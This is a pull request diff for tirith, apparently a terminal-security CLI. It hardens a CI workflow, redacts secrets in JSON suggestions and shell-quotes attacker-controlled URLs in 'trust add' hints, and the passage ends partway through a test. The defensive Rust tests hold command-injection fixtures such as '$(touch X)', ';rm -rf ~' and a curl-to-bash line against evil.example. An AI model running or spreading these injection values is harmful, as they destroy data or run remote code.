### PR TITLE
feat(ux): CLI transparency + safety-UX pass (14 dogfood improvements)

### DIFF
--- a/.github/workflows/threatdb.yml
+++ b/.github/workflows/threatdb.yml
@@ -8,11 +8,21 @@ on:
 permissions:
   contents: write
 
+concurrency:
+  # Serialize manual + scheduled runs: each run pushes the manifest to main and
+  # mutates the single rolling release, so overlapping runs must not interleave.
+  group: threatdb-build
+  cancel-in-progress: false
+
 env:
   CARGO_TERM_COLOR: always
 
 jobs:
   build-threatdb:
+    # Hard guard: this job mutates GitHub releases and pushes HEAD:main, so it
+    # must be impossible from any non-default branch (e.g. a feature-branch
+    # workflow_dispatch). schedule/dispatch always use main's copy anyway.
+    if: github.ref == 'refs/heads/main'
     runs-on: ubuntu-latest
     env:
       # github.run_id and github.run_attempt are GitHub-controlled numeric
@@ -63,31 +73,52 @@ jobs:
             --cisa-kev /tmp/cisa-kev.json \
             --sequence "${RUN_ID}" \
             --sign-key-env TIRITH_THREATDB_SIGNING_KEY \
-            --output tirith-threatdb.dat
+            --output "tirith-threatdb-${RUN_ID}-${RUN_ATTEMPT}.dat"
 
       # Generate + sign manifest for client discovery
       - name: Generate signed manifest
         env:
           TIRITH_THREATDB_SIGNING_KEY: ${{ secrets.THREATDB_SIGNING_KEY }}
         run: |
-          SHA=$(sha256sum tirith-threatdb.dat | cut -d' ' -f1)
-          SIZE=$(stat -c%s tirith-threatdb.dat)
-          URL="https://github.com/sheeki03/tirith/releases/download/threatdb-${RUN_ID}-${RUN_ATTEMPT}/tirith-threatdb.dat"
+          set -euo pipefail
+          DB_ASSET="tirith-threatdb-${RUN_ID}-${RUN_ATTEMPT}.dat"
+          SHA=$(sha256sum "$DB_ASSET" | cut -d' ' -f1)
+          SIZE=$(stat -c%s "$DB_ASSET")
+          URL="https://github.com/sheeki03/tirith/releases/download/threatdb-latest/${DB_ASSET}"
+          # PAYLOAD MUST stay byte-identical to the client's canonical_payload() in
+          # crates/tirith/src/cli/threatdb_cmd.rs (alphabetical keys, compact, no
+          # spaces) — only the $URL value differs from older versions. The signature
+          # is over these literal bytes; a stray space breaks every client. Guarded
+          # by the canonical_payload_* unit tests and the self-check below.
           PAYLOAD="{\"sha256\":\"$SHA\",\"size\":$SIZE,\"url\":\"$URL\",\"version\":${RUN_ID}}"
+          CANON=$(printf '%s' "$PAYLOAD" | jq -cS .)
+          if [ "$PAYLOAD" != "$CANON" ]; then
+            echo "::error::PAYLOAD is not in canonical form. got=$PAYLOAD want=$CANON"
+            exit 1
+          fi
           SIG=$(./target/release/tirith-threatdb-compile sign-payload \
             --payload "$PAYLOAD" --key-env TIRITH_THREATDB_SIGNING_KEY)
           cat > threatdb-manifest.json <<EEOF
           {"version":${RUN_ID},"sha256":"$SHA","size":$SIZE,"url":"$URL","signature":"$SIG"}
           EEOF
 
-      # Publish DB as release
+      # Publish to ONE rolling prerelease so the daily DB builds stop burying the
+      # v* binary releases past page 1 of the releases feed (issue #140). The .dat
+      # is run-scoped (immutable, never overwritten) to avoid an asset-swap race;
+      # the manifest is overwritten in place. The tag stays pinned where it was
+      # first created (we deliberately do NOT set target_commitish).
       - name: Publish release
         uses: softprops/action-gh-release@v2
         with:
-          tag_name: threatdb-${{ github.run_id }}-${{ github.run_attempt }}
+          tag_name: threatdb-latest
+          prerelease: true
           make_latest: false
+          overwrite_files: true
+          fail_on_unmatched_files: true
+          name: "Threat DB (rolling)"
+          body: "Auto-updated threat-intelligence database (prerelease channel). Not a versioned download; tirith resolves it via the signed manifest. See #140."
           files: |
-            tirith-threatdb.dat
+            tirith-threatdb-${{ github.run_id }}-${{ github.run_attempt }}.dat
             threatdb-manifest.json
 
       # Push manifest update directly to main. Branch is unprotected and the
@@ -107,3 +138,32 @@ jobs:
           # Absorb any commits that landed on main during the build, then push.
           git pull --rebase --autostash origin main
           git push origin HEAD:main
+
+      # Keep only the newest N run-scoped DB assets on the rolling release so it
+      # doesn't accumulate one asset per day forever. Never touches the manifest.
+      # N=3 leaves slack for an in-flight client still holding a prior manifest.
+      - name: Prune old threatdb assets
+        env:
+          GH_TOKEN: ${{ github.token }}
+          KEEP: "3"
+        run: |
+          set -euo pipefail
+          mapfile -t STALE < <(
+            gh release view threatdb-latest --repo "${{ github.repository }}" \
+              --json assets \
+              --jq '.assets[].name | select(test("^tirith-threatdb-[0-9]+-[0-9]+\\.dat$"))' \
+            | sort -t- -k3,3nr -k4,4nr \
+            | tail -n +"$((KEEP + 1))"
+          )
+          if [ "${#STALE[@]}" -eq 0 ]; then
+            echo "Prune: nothing to delete."
+            exit 0
+          fi
+          for asset in "${STALE[@]}"; do
+            case "$asset" in
+              threatdb-manifest.json) continue ;;
+            esac
+            echo "Pruning stale asset: $asset"
+            gh release delete-asset threatdb-latest "$asset" \
+              --repo "${{ github.repository }}" --yes
+          done

--- a/README.md
+++ b/README.md
@@ -29,6 +29,7 @@ Browsers solved this years ago. Terminals still render Unicode, ANSI escapes, an
 
 ```bash
 brew install sheeki03/tap/tirith
+brew trust --formula sheeki03/tap/tirith   # Homebrew 5.1.15+ tap trust
 ```
 
 Then activate in your shell profile:
@@ -395,7 +396,14 @@ Detects content invisible to humans but readable by AI in HTML, Markdown, and PD
 
 ```bash
 brew install sheeki03/tap/tirith
+brew trust --formula sheeki03/tap/tirith   # Homebrew 5.1.15+ tap trust
 ```
+
+Homebrew 5.1.15 and newer treat third-party taps as untrusted until you opt in
+(loading a tap evaluates its Ruby). `brew trust --formula sheeki03/tap/tirith`
+trusts just this formula; `brew trust sheeki03/tap` trusts the whole tap. Without
+it you'll see a "tap is not trusted" warning, and from Homebrew 5.2.0 / 6.0.0
+(whichever lands first) the trust step becomes required.
 
 ### Linux Packages
 

--- a/crates/tirith-core/src/output.rs
+++ b/crates/tirith-core/src/output.rs
@@ -197,8 +197,9 @@ pub fn write_human(verdict: &Verdict, warn_only: bool, mut w: impl Write) -> std
 /// Block verdict warrants the blast-radius header (item 14c). Covers the whole
 /// `Blast*` family (both the hot-path `cheap_check` rules and the
 /// `tirith preview` simulator rules, so a preview verdict reads the same) and
-/// every pipe-to-interpreter variant. Match is exhaustive on purpose: a new
-/// destructive/fetch RuleId surfaces here as a compile error to be triaged.
+/// every pipe-to-interpreter variant. This list is hand-maintained: `matches!`
+/// falls through to `false`, so a new destructive/fetch RuleId added to the enum
+/// will silently NOT get the blast-radius header until it is added here.
 fn is_destructive_or_fetch_pipe(r: RuleId) -> bool {
     matches!(
         r,

--- a/crates/tirith-core/src/output.rs
+++ b/crates/tirith-core/src/output.rs
@@ -51,9 +51,37 @@ pub struct JsonOutput<'a> {
     #[serde(skip_serializing_if = "Option::is_none")]
     pub urls_extracted_count: Option<usize>,
     /// Safer-command suggestions: a (possibly empty) array when the caller
-    /// passed `--suggest-safe-command`, omitted otherwise.
+    /// passed `--suggest-safe-command`, omitted otherwise. These are owned
+    /// redacted copies (not borrowed) because a suggestion's `safe_command`
+    /// can re-embed the original command/URL/path, so it must run through the
+    /// same `custom_patterns` redaction as `findings` before it is serialized.
+    /// See [`redact_suggestion`].
     #[serde(skip_serializing_if = "Option::is_none")]
-    pub safe_suggestions: Option<&'a [SafeSuggestion]>,
+    pub safe_suggestions: Option<Vec<SafeSuggestion>>,
+}
+
+/// Return a redacted clone of a [`SafeSuggestion`] for JSON output.
+///
+/// `safe_command` re-embeds the user's original command/URL/path (the
+/// pipe-to-shell, sudo-narrow, env-scrub, archive, and dotfile rewrites all
+/// splice attacker- or user-controlled input back in), and `rationale` is a
+/// per-rule string that some transforms (env-scrub) build with a runtime value.
+/// Both are therefore scrubbed with the SAME `custom_patterns` the caller uses
+/// for `findings`, via [`crate::redact::redact_with_custom`] (the exact
+/// primitive `redact_finding` applies to a finding's free-text fields).
+///
+/// `rule_id` (a fixed snake_case rule name) and `remediation` (static per-rule
+/// advice) are secret-free by construction and pass through unchanged.
+fn redact_suggestion(s: &SafeSuggestion, custom_patterns: &[String]) -> SafeSuggestion {
+    SafeSuggestion {
+        rule_id: s.rule_id.clone(),
+        safe_command: s
+            .safe_command
+            .as_deref()
+            .map(|c| crate::redact::redact_with_custom(c, custom_patterns)),
+        rationale: crate::redact::redact_with_custom(&s.rationale, custom_patterns),
+        remediation: s.remediation.clone(),
+    }
 }
 
 /// Write verdict as JSON to the given writer.
@@ -75,6 +103,15 @@ pub fn write_json_with_suggestions(
 ) -> std::io::Result<()> {
     let redacted_findings = crate::redact::redacted_findings(&verdict.findings, custom_patterns);
     let findings: Vec<FindingView> = redacted_findings.iter().map(FindingView::of).collect();
+    // A SafeSuggestion's `safe_command` re-embeds the original command/URL/path,
+    // so it would reintroduce exactly the secrets `custom_patterns` redacted out
+    // of `findings`. Redact each suggestion with the same patterns before it is
+    // serialized (see `redact_suggestion`).
+    let safe_suggestions = suggestions.map(|sugg| {
+        sugg.iter()
+            .map(|s| redact_suggestion(s, custom_patterns))
+            .collect::<Vec<_>>()
+    });
     let output = JsonOutput {
         schema_version: SCHEMA_VERSION,
         action: verdict.action,
@@ -86,7 +123,7 @@ pub fn write_json_with_suggestions(
         policy_path_used: &verdict.policy_path_used,
         timings_ms: &verdict.timings_ms,
         urls_extracted_count: verdict.urls_extracted_count,
-        safe_suggestions: suggestions,
+        safe_suggestions,
     };
     serde_json::to_writer(&mut w, &output)?;
     writeln!(w)?;
@@ -677,6 +714,62 @@ mod tests {
         let arr = v["safe_suggestions"].as_array().unwrap();
         assert_eq!(arr.len(), 1);
         assert_eq!(arr[0]["rule_id"], "plain_http_to_sink");
+    }
+
+    #[test]
+    fn write_json_with_suggestions_redacts_custom_pattern_in_safe_command() {
+        // A SafeSuggestion's `safe_command` re-embeds the original command/URL,
+        // so a secret the caller asked to redact via `custom_patterns` would be
+        // reintroduced verbatim into JSON unless the suggestion is redacted too.
+        // Build a suggestion whose rewrite carries the secret, then assert the
+        // raw secret never reaches the serialized output (only `[REDACTED:...]`),
+        // while the suggestion structure (rule_id + the safe_command key) stays.
+        let verdict = block_verdict_with_bypass();
+        let secret = "SECRET123";
+        let custom = vec![secret.to_string()];
+        let sugg = vec![SafeSuggestion {
+            rule_id: "curl_pipe_shell".to_string(),
+            // Mirrors what `rewrite_pipe_to_shell` emits: the original URL spliced
+            // back into the rewrite. Here the URL carries the custom-pattern token.
+            safe_command: Some(format!(
+                "curl -fsSL -o /tmp/tirith-review.sh 'https://evil.example/{secret}' && \
+                 less /tmp/tirith-review.sh && bash /tmp/tirith-review.sh"
+            )),
+            // Also plant it in the rationale (env-scrub builds this at runtime).
+            rationale: format!("downloads {secret} for review"),
+            remediation: "review before running".to_string(),
+        }];
+
+        let mut buf = Vec::new();
+        write_json_with_suggestions(&verdict, &custom, Some(&sugg), &mut buf).unwrap();
+        let raw = String::from_utf8(buf).unwrap();
+
+        // The raw secret must NOT survive anywhere in the serialized JSON.
+        assert!(
+            !raw.contains(secret),
+            "custom-pattern secret must be redacted out of safe_suggestions JSON: {raw}"
+        );
+        // The redaction marker proves the scrub ran (not that the field was dropped).
+        assert!(
+            raw.contains("[REDACTED:custom]"),
+            "redacted safe_command must carry the custom redaction marker: {raw}"
+        );
+
+        // The suggestion structure must remain intact: array present, with the
+        // rule_id and a (now-redacted) safe_command key still serialized.
+        let v: serde_json::Value = serde_json::from_str(&raw).unwrap();
+        let arr = v["safe_suggestions"].as_array().unwrap();
+        assert_eq!(arr.len(), 1);
+        assert_eq!(arr[0]["rule_id"], "curl_pipe_shell");
+        let sc = arr[0]["safe_command"]
+            .as_str()
+            .expect("safe_command must still be present (redacted, not dropped)");
+        assert!(
+            !sc.contains(secret) && sc.contains("[REDACTED:custom]"),
+            "safe_command must be the redacted rewrite: {sc}"
+        );
+        // The static, secret-free fields pass through unchanged.
+        assert_eq!(arr[0]["remediation"], "review before running");
     }
 
     #[test]

--- a/crates/tirith-core/src/output.rs
+++ b/crates/tirith-core/src/output.rs
@@ -296,8 +296,18 @@ fn write_block_advisories(verdict: &Verdict, mut w: impl Write) -> std::io::Resu
             // would otherwise execute the moment the developer pastes it.
             // `sanitize_field` (terminal-control scrub, kept for display defense)
             // is NOT a shell escaper. If the target can't be safely single-quoted
-            // (e.g. it contains a newline), refuse to print a runnable command.
-            match crate::safe_command::shell_single_quote(&sanitize_field(url)) {
+            // (e.g. it contains a newline), refuse to print a runnable command. And
+            // if the scrub CHANGED the target (zero-width/control bytes stripped),
+            // a `trust add <scrubbed>` would trust a DIFFERENT target than the one
+            // that was blocked, so fall back to the manual message rather than
+            // emit a misleading command.
+            let sanitized = sanitize_field(url);
+            let quoted = if sanitized == url {
+                crate::safe_command::shell_single_quote(&sanitized)
+            } else {
+                None
+            };
+            match quoted {
                 Some(quoted) => writeln!(
                     w,
                     "  To allow: tirith trust add {quoted} --rule {rule} --ttl 30d"
@@ -314,9 +324,17 @@ fn write_block_advisories(verdict: &Verdict, mut w: impl Write) -> std::io::Resu
         // without `--broad`, and `--broad` trusts the whole domain.
         let domains = crate::session_warnings::extract_domains_from_evidence(&finding.evidence);
         if let Some(domain) = domains.first() {
-            // Same shell-injection hazard as the URL branch — single-quote the
-            // attacker-controlled domain before it lands in a pasteable command.
-            match crate::safe_command::shell_single_quote(&sanitize_field(domain)) {
+            // Same shell-injection hazard as the URL branch: single-quote the
+            // attacker-controlled domain before it lands in a pasteable command,
+            // and fall back to the manual message if the scrub changed the target
+            // (a `trust add <scrubbed>` would trust a different domain than blocked).
+            let sanitized = sanitize_field(domain);
+            let quoted = if &sanitized == domain {
+                crate::safe_command::shell_single_quote(&sanitized)
+            } else {
+                None
+            };
+            match quoted {
                 Some(quoted) => writeln!(
                     w,
                     "  To allow (trusts the whole domain): tirith trust add {quoted} --broad --rule {rule} --ttl 30d"
@@ -1143,6 +1161,38 @@ mod tests {
             assert!(
                 out.contains("trust this target manually with `tirith trust add`"),
                 "an unquotable target must fall back to the safe manual note (color={color}): {out}"
+            );
+        }
+    }
+
+    #[test]
+    fn block_to_allow_target_changed_by_scrub_prints_safe_fallback_not_command() {
+        // If terminal-control scrubbing CHANGES the target (here a zero-width
+        // space is stripped), a `trust add <scrubbed>` would trust a DIFFERENT
+        // target than the one blocked, so we must print the manual fallback rather
+        // than a misleading runnable command.
+        let verdict = block_verdict_with_evidence(
+            RuleId::ShortenedUrl,
+            vec![Evidence::Url {
+                // U+200B ZERO WIDTH SPACE inside the host: quotable, but scrubbed.
+                raw: "https://exa\u{200b}mple.com/x".to_string(),
+            }],
+        );
+        for color in [false, true] {
+            let mut buf = Vec::new();
+            if color {
+                write_human(&verdict, false, &mut buf).unwrap();
+            } else {
+                write_human_no_color(&verdict, false, &mut buf).unwrap();
+            }
+            let out = String::from_utf8(buf).unwrap();
+            assert!(
+                !out.contains("tirith trust add 'https"),
+                "a scrub-altered target must not produce a runnable command (color={color}): {out}"
+            );
+            assert!(
+                out.contains("trust this target manually with `tirith trust add`"),
+                "a scrub-altered target must fall back to the safe manual note (color={color}): {out}"
             );
         }
     }

--- a/crates/tirith-core/src/output.rs
+++ b/crates/tirith-core/src/output.rs
@@ -252,22 +252,43 @@ fn write_block_advisories(verdict: &Verdict, mut w: impl Write) -> std::io::Resu
         let rule = finding.rule_id; // snake_case via Display
                                     // Prefer a full URL: it is a NARROW trust pattern, so no `--broad`.
         if let Some(url) = first_url_in_evidence(&finding.evidence) {
-            writeln!(
-                w,
-                "  To allow: tirith trust add {} --rule {rule} --ttl 30d",
-                sanitize_field(url)
-            )?;
+            // The URL is attacker-controlled and the line is meant to be
+            // copy/pasted into a shell, so it MUST be shell-single-quoted: a URL
+            // carrying `$( )`, backticks, `;`, spaces, a `>` redirect, or a glob
+            // would otherwise execute the moment the developer pastes it.
+            // `sanitize_field` (terminal-control scrub, kept for display defense)
+            // is NOT a shell escaper. If the target can't be safely single-quoted
+            // (e.g. it contains a newline), refuse to print a runnable command.
+            match crate::safe_command::shell_single_quote(&sanitize_field(url)) {
+                Some(quoted) => writeln!(
+                    w,
+                    "  To allow: tirith trust add {quoted} --rule {rule} --ttl 30d"
+                )?,
+                None => writeln!(
+                    w,
+                    "  To allow: trust this target manually with `tirith trust add` \
+                     (it contains characters unsafe to embed in a suggested command)."
+                )?,
+            }
             break;
         }
         // Else fall back to a bare domain; `trust add` rejects bare domains
         // without `--broad`, and `--broad` trusts the whole domain.
         let domains = crate::session_warnings::extract_domains_from_evidence(&finding.evidence);
         if let Some(domain) = domains.first() {
-            writeln!(
-                w,
-                "  To allow (trusts the whole domain): tirith trust add {} --broad --rule {rule} --ttl 30d",
-                sanitize_field(domain)
-            )?;
+            // Same shell-injection hazard as the URL branch — single-quote the
+            // attacker-controlled domain before it lands in a pasteable command.
+            match crate::safe_command::shell_single_quote(&sanitize_field(domain)) {
+                Some(quoted) => writeln!(
+                    w,
+                    "  To allow (trusts the whole domain): tirith trust add {quoted} --broad --rule {rule} --ttl 30d"
+                )?,
+                None => writeln!(
+                    w,
+                    "  To allow: trust this target manually with `tirith trust add` \
+                     (it contains characters unsafe to embed in a suggested command)."
+                )?,
+            }
             break;
         }
     }
@@ -825,7 +846,8 @@ mod tests {
     #[test]
     fn block_with_full_url_renders_to_allow_without_broad() {
         // 14a: a finding carrying a full URL emits the NARROW trust line — the
-        // exact URL, the snake_case rule id, a 30d TTL, and NO `--broad`.
+        // exact URL (single-quoted), the snake_case rule id, a 30d TTL, and NO
+        // `--broad`.
         let verdict = block_verdict_with_evidence(
             RuleId::ShortenedUrl,
             vec![Evidence::Url {
@@ -842,9 +864,9 @@ mod tests {
             let out = String::from_utf8(buf).unwrap();
             assert!(
                 out.contains(
-                    "To allow: tirith trust add https://bit.ly/x --rule shortened_url --ttl 30d"
+                    "To allow: tirith trust add 'https://bit.ly/x' --rule shortened_url --ttl 30d"
                 ),
-                "full-URL block must render the narrow To-allow line (color={color}): {out}"
+                "full-URL block must render the narrow, single-quoted To-allow line (color={color}): {out}"
             );
             assert!(
                 !out.contains("--broad"),
@@ -856,7 +878,8 @@ mod tests {
     #[test]
     fn block_with_bare_domain_only_renders_broad_to_allow() {
         // 14a: a finding with only a HOST (no full URL) must emit the domain form
-        // WITH `--broad`, because `trust add` rejects bare domains otherwise.
+        // WITH `--broad` (single-quoted), because `trust add` rejects bare domains
+        // otherwise.
         let verdict = block_verdict_with_evidence(
             RuleId::ConfusableDomain,
             vec![Evidence::HostComparison {
@@ -869,16 +892,16 @@ mod tests {
         let out = String::from_utf8(buf).unwrap();
         assert!(
             out.contains(
-                "To allow (trusts the whole domain): tirith trust add gіthub.com --broad --rule confusable_domain --ttl 30d"
+                "To allow (trusts the whole domain): tirith trust add 'gіthub.com' --broad --rule confusable_domain --ttl 30d"
             ),
-            "bare-domain block must render the --broad To-allow line: {out}"
+            "bare-domain block must render the single-quoted --broad To-allow line: {out}"
         );
     }
 
     #[test]
     fn block_with_url_and_host_prefers_full_url_no_broad() {
         // When both a full URL and a host are present, the full URL wins (narrow,
-        // no --broad) and only ONE To-allow line is emitted.
+        // no --broad, single-quoted) and only ONE To-allow line is emitted.
         let verdict = block_verdict_with_evidence(
             RuleId::PlainHttpToSink,
             vec![
@@ -896,7 +919,7 @@ mod tests {
         let out = String::from_utf8(buf).unwrap();
         assert!(
             out.contains(
-                "tirith trust add http://evil.example/x.sh --rule plain_http_to_sink --ttl 30d"
+                "tirith trust add 'http://evil.example/x.sh' --rule plain_http_to_sink --ttl 30d"
             ),
             "full URL must be preferred over the host: {out}"
         );
@@ -909,6 +932,125 @@ mod tests {
             1,
             "exactly one To-allow line: {out}"
         );
+    }
+
+    #[test]
+    fn block_to_allow_url_shell_quotes_injection_payloads() {
+        // F1 (HIGH): the To-allow line is meant to be copy/pasted into a shell,
+        // so an attacker-controlled URL carrying shell metacharacters must be
+        // single-quoted — a developer who pastes the suggested line must NOT
+        // trigger command substitution, separators, redirects, or globbing.
+        let hostile = [
+            "https://x/$(touch X)",
+            "https://x/`id`",
+            "https://x/a;rm -rf ~",
+            "https://x/a b",
+            "https://x/a'b",
+            "https://x/a>b",
+            "https://x/a*b",
+        ];
+        for raw in hostile {
+            let verdict = block_verdict_with_evidence(
+                RuleId::ShortenedUrl,
+                vec![Evidence::Url {
+                    raw: raw.to_string(),
+                }],
+            );
+            for color in [false, true] {
+                let mut buf = Vec::new();
+                if color {
+                    write_human(&verdict, false, &mut buf).unwrap();
+                } else {
+                    write_human_no_color(&verdict, false, &mut buf).unwrap();
+                }
+                let out = String::from_utf8(buf).unwrap();
+                let line = out
+                    .lines()
+                    .find(|l| l.contains("tirith trust add"))
+                    .unwrap_or_else(|| {
+                        panic!("no To-allow line for {raw:?} (color={color}): {out}")
+                    });
+                // The emitted token is the single-quoted form of the URL. A
+                // single quote in the URL is escaped as '\'' (still one token).
+                let expected_token =
+                    crate::safe_command::shell_single_quote(raw).expect("quotable URL");
+                assert!(
+                    line.contains(&expected_token),
+                    "URL must be single-quoted on the To-allow line so a shell would NOT \
+                     expand it (raw={raw:?}, color={color}): {line}"
+                );
+                // The dangerous fragment must never appear UNquoted (outside the
+                // single-quoted token), which is what would let it execute.
+                let outside = line.replace(&expected_token, "");
+                for needle in ["$(", "`", ";rm", " a b", ">b", "*b"] {
+                    assert!(
+                        !outside.contains(needle),
+                        "no bare {needle:?} may survive outside the quoted token \
+                         (raw={raw:?}): {line}"
+                    );
+                }
+            }
+        }
+    }
+
+    #[test]
+    fn block_to_allow_domain_shell_quotes_injection_payloads() {
+        // F1 (HIGH): same neutralization on the bare-domain (`--broad`) branch.
+        // `extract_domains_from_evidence` pulls the host from `raw_host`, so plant
+        // the hostile metacharacters there.
+        let verdict = block_verdict_with_evidence(
+            RuleId::ConfusableDomain,
+            vec![Evidence::HostComparison {
+                raw_host: "evil.example/$(touch X)".to_string(),
+                similar_to: "ok.example".to_string(),
+            }],
+        );
+        let mut buf = Vec::new();
+        write_human_no_color(&verdict, false, &mut buf).unwrap();
+        let out = String::from_utf8(buf).unwrap();
+        let line = out
+            .lines()
+            .find(|l| l.contains("tirith trust add"))
+            .unwrap_or_else(|| panic!("no To-allow line: {out}"));
+        assert!(
+            line.contains('\''),
+            "the domain target must be single-quoted: {line}"
+        );
+        // `$(touch X)` must not appear bare (outside the quoted token).
+        assert!(
+            !line.contains("add $(") && !line.contains("add evil.example/$("),
+            "the command substitution must be inside single quotes, not runnable: {line}"
+        );
+    }
+
+    #[test]
+    fn block_to_allow_url_with_newline_prints_safe_fallback_not_command() {
+        // F1 (HIGH): a target that cannot be safely single-quoted (it contains a
+        // newline) must NOT yield a runnable `tirith trust add` command line —
+        // instead a safe manual-trust note is printed.
+        let verdict = block_verdict_with_evidence(
+            RuleId::ShortenedUrl,
+            vec![Evidence::Url {
+                raw: "https://x/a\nrm -rf ~".to_string(),
+            }],
+        );
+        for color in [false, true] {
+            let mut buf = Vec::new();
+            if color {
+                write_human(&verdict, false, &mut buf).unwrap();
+            } else {
+                write_human_no_color(&verdict, false, &mut buf).unwrap();
+            }
+            let out = String::from_utf8(buf).unwrap();
+            assert!(
+                !out.contains("tirith trust add 'https"),
+                "an unquotable (newline) target must not produce a runnable command (color={color}): {out}"
+            );
+            assert!(
+                out.contains("trust this target manually with `tirith trust add`"),
+                "an unquotable target must fall back to the safe manual note (color={color}): {out}"
+            );
+        }
     }
 
     #[test]

--- a/crates/tirith-core/src/output.rs
+++ b/crates/tirith-core/src/output.rs
@@ -1,7 +1,7 @@
 use std::io::Write;
 
 use crate::safe_command::SafeSuggestion;
-use crate::verdict::{Action, Evidence, Finding, Verdict};
+use crate::verdict::{Action, Evidence, Finding, RuleId, Verdict};
 
 const SCHEMA_VERSION: u32 = 3;
 
@@ -172,6 +172,10 @@ pub fn write_human(verdict: &Verdict, warn_only: bool, mut w: impl Write) -> std
         }
     }
 
+    if verdict.action == Action::Block {
+        write_block_advisories(verdict, &mut w)?;
+    }
+
     if verdict.action == Action::Block && verdict.bypass_available {
         if is_warn_only_block {
             writeln!(
@@ -187,6 +191,99 @@ pub fn write_human(verdict: &Verdict, warn_only: bool, mut w: impl Write) -> std
     }
 
     Ok(())
+}
+
+/// True for the destructive-filesystem and fetch-pipe rules whose presence in a
+/// Block verdict warrants the blast-radius header (item 14c). Covers the whole
+/// `Blast*` family (both the hot-path `cheap_check` rules and the
+/// `tirith preview` simulator rules, so a preview verdict reads the same) and
+/// every pipe-to-interpreter variant. Match is exhaustive on purpose: a new
+/// destructive/fetch RuleId surfaces here as a compile error to be triaged.
+fn is_destructive_or_fetch_pipe(r: RuleId) -> bool {
+    matches!(
+        r,
+        RuleId::BlastDeletesOutsideRepo
+            | RuleId::BlastWritesSystemPath
+            | RuleId::BlastSymlinkTraversal
+            | RuleId::BlastEmptyVarGlob
+            | RuleId::BlastFindDelete
+            | RuleId::BlastRsyncDelete
+            | RuleId::BlastLargeFileCount
+            | RuleId::PipeToInterpreter
+            | RuleId::CurlPipeShell
+            | RuleId::WgetPipeShell
+            | RuleId::HttpiePipeShell
+            | RuleId::XhPipeShell
+    )
+}
+
+/// Shared advisory block appended to a `Block` verdict by both `write_human` and
+/// `write_human_no_color` (presentation only — no detection/verdict logic).
+///
+/// Emits, in order:
+/// * **14c blast-radius header** — when the verdict ALREADY contains any
+///   destructive/fetch-pipe finding (the engine ran `blast_radius::cheap_check`
+///   on the exec path, so this only summarizes existing findings; it never
+///   recomputes). One line, pointing at `tirith preview`.
+/// * **14a "To allow" line** — the first finding carrying a URL or host in its
+///   evidence yields a copy-pasteable `tirith trust add` invocation. A full URL
+///   is a NARROW trust pattern (no `--broad`); a bare domain needs `--broad`
+///   because `trust add` rejects bare domains otherwise. Findings without any
+///   URL/host (e.g. a destructive-fs block) emit no line.
+///
+/// Both lines are part of the BLOCK verdict the user must see — unconditional,
+/// never gated on a quiet flag.
+fn write_block_advisories(verdict: &Verdict, mut w: impl Write) -> std::io::Result<()> {
+    // 14c — summarize the destructive/fetch-pipe findings already in the verdict.
+    let destructive_count = verdict
+        .findings
+        .iter()
+        .filter(|f| is_destructive_or_fetch_pipe(f.rule_id))
+        .count();
+    if destructive_count > 0 {
+        writeln!(
+            w,
+            "  blast radius: {destructive_count} finding(s) here can destroy files or run remote code — preview with `tirith preview -- <cmd>`"
+        )?;
+    }
+
+    // 14a — first finding with a URL or host in its evidence yields a trust hint.
+    for finding in &verdict.findings {
+        let rule = finding.rule_id; // snake_case via Display
+                                    // Prefer a full URL: it is a NARROW trust pattern, so no `--broad`.
+        if let Some(url) = first_url_in_evidence(&finding.evidence) {
+            writeln!(
+                w,
+                "  To allow: tirith trust add {} --rule {rule} --ttl 30d",
+                sanitize_field(url)
+            )?;
+            break;
+        }
+        // Else fall back to a bare domain; `trust add` rejects bare domains
+        // without `--broad`, and `--broad` trusts the whole domain.
+        let domains = crate::session_warnings::extract_domains_from_evidence(&finding.evidence);
+        if let Some(domain) = domains.first() {
+            writeln!(
+                w,
+                "  To allow (trusts the whole domain): tirith trust add {} --broad --rule {rule} --ttl 30d",
+                sanitize_field(domain)
+            )?;
+            break;
+        }
+    }
+
+    Ok(())
+}
+
+/// The raw string of the first `Evidence::Url` in a finding's evidence, if any.
+/// This is the only `Evidence` variant that carries a full URL verbatim; host-
+/// only variants (`HostComparison`) are handled by the domain fallback in
+/// [`write_block_advisories`].
+fn first_url_in_evidence(evidence: &[Evidence]) -> Option<&str> {
+    evidence.iter().find_map(|ev| match ev {
+        Evidence::Url { raw } => Some(raw.as_str()),
+        _ => None,
+    })
 }
 
 /// Format a string highlighting suspicious characters — red background when
@@ -353,6 +450,10 @@ fn write_human_no_color(
         if !fix.is_empty() {
             writeln!(w, "    Fix: {fix}")?;
         }
+    }
+
+    if verdict.action == Action::Block {
+        write_block_advisories(verdict, &mut w)?;
     }
 
     if verdict.action == Action::Block && verdict.bypass_available {
@@ -695,6 +796,211 @@ mod tests {
         assert!(
             !cout.contains("\x1b[2J"),
             "color Visual line must strip the attacker's clear-screen CSI: {cout}"
+        );
+    }
+
+    /// Helper: a Block verdict carrying a single finding with the given rule and
+    /// evidence, mirroring `block_verdict_with_bypass`'s field initialization.
+    fn block_verdict_with_evidence(rule_id: RuleId, evidence: Vec<Evidence>) -> Verdict {
+        let mut v = Verdict::from_findings(
+            vec![Finding {
+                rule_id,
+                severity: Severity::High,
+                title: "t".to_string(),
+                description: "d".to_string(),
+                evidence,
+                human_view: None,
+                agent_view: None,
+                mitre_id: None,
+                custom_rule_id: None,
+            }],
+            3,
+            Timings::default(),
+        );
+        v.action = Action::Block;
+        v.bypass_available = true;
+        v
+    }
+
+    #[test]
+    fn block_with_full_url_renders_to_allow_without_broad() {
+        // 14a: a finding carrying a full URL emits the NARROW trust line — the
+        // exact URL, the snake_case rule id, a 30d TTL, and NO `--broad`.
+        let verdict = block_verdict_with_evidence(
+            RuleId::ShortenedUrl,
+            vec![Evidence::Url {
+                raw: "https://bit.ly/x".to_string(),
+            }],
+        );
+        for color in [false, true] {
+            let mut buf = Vec::new();
+            if color {
+                write_human(&verdict, false, &mut buf).unwrap();
+            } else {
+                write_human_no_color(&verdict, false, &mut buf).unwrap();
+            }
+            let out = String::from_utf8(buf).unwrap();
+            assert!(
+                out.contains(
+                    "To allow: tirith trust add https://bit.ly/x --rule shortened_url --ttl 30d"
+                ),
+                "full-URL block must render the narrow To-allow line (color={color}): {out}"
+            );
+            assert!(
+                !out.contains("--broad"),
+                "a full URL is a narrow trust pattern — no --broad (color={color}): {out}"
+            );
+        }
+    }
+
+    #[test]
+    fn block_with_bare_domain_only_renders_broad_to_allow() {
+        // 14a: a finding with only a HOST (no full URL) must emit the domain form
+        // WITH `--broad`, because `trust add` rejects bare domains otherwise.
+        let verdict = block_verdict_with_evidence(
+            RuleId::ConfusableDomain,
+            vec![Evidence::HostComparison {
+                raw_host: "gіthub.com".to_string(),
